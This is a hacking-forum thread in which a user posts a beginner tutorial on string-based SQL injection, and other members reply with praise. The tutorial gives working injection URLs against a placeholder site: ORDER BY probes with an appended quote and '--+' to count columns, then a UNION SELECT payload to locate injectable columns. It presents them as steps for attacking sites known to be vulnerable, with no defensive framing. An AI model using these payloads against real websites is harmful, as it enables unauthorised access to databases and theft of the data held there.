[Crow_SL]

String Based SQLi

Introduction

Hi all on Anarchy Forum,
In this tutorial I will show you how to do String Based SQLi.
It's very easy to do and its like Normal SQLi. This tutorial will be a short one.
So lets started, shall we?

This type of SQLi is used when you don't get error after command ORDER BY, so I will show you what to do next.

Searching for error

So if you know any basics of Normal SQLi you will know what ORDER BY is and when and for what it's used, so I will not explain it to you in this tutorial.

Ok we have this site ( e.g )

Code:

www.site.com/index.php?id=# --> this is some number

And you know its vulnerable to SQLi.
Now we you use ORDER BY

Code:

www.site.com/index.php?id=# order by 5--

After that the site loads normally like it was refreshed
So you go up with the number

Code:

www.site.com/index.php?id=# order by 10--

Same thing like when we had number 5
So you go up even more

Code:

www.site.com/index.php?id=# order by 99--

Same fucking thing, no error
Now we will use String based SQLi

Bypassing our no error problem

Now we try again with String Based SQLi to find number of columns
We will do that by adding ' on the end of sites number and + after our syntax.
The syntax will look like this:

Code:

www.site.com/index.php?id=#' order by 1--+

No error ( its because there is more then 1 column )
Now we type in our syntax this:

Code:

www.site.com/index.php?id=#' order by 99--+

We got error! YAY. ( there is less then 99 columns ofc )
Now we need to find exact number
Syntax:

Code:

www.site.com/index.php?id=#' order by 5--+

No error. Lets go up

Code:

www.site.com/index.php?id=#' order by 10--+

Error now lets go down because there is less then 10 columns

Code:

www.site.com/index.php?id=#' order by 9--+

We got error again, lower it more

Code:

www.site.com/index.php?id=#' order by 8--+

No error, that means that there is 8 columns.

-Finding Tables and Columns

So the rest of syntax will be like normal SQLi but you must keep ' and +
For finding vulnerable number:

Code:

www.site.com/index.php?id=-#' union select 1,2,3,4,5,6,7,8--+

Now we got on the page numbers
4,1,6. ( always take first number (e.g. 4))

Thats it guys, if you know normal SQLi you will know what to do next
Thank you and i hope this will be helpful. This will be my last tutorial for now becouse im on phone so more soon

-crow

[BreShiE]

Nice tutorial Crow, great for those newcomers!

[Crow_SL]

Nice tutorial Crow, great for those newcomers!

Thank you very much yeah this method is quite rare

[Merkuri]

Nice tutorial for beginners keep it up.

[Crow_SL]

Thank you bro appreciated

[Adorapuff]

I learned SQL from a tut teaching string-based

[Crow_SL]

I learned SQL from a tut teaching string-based

You mean SQL Injection or SQL?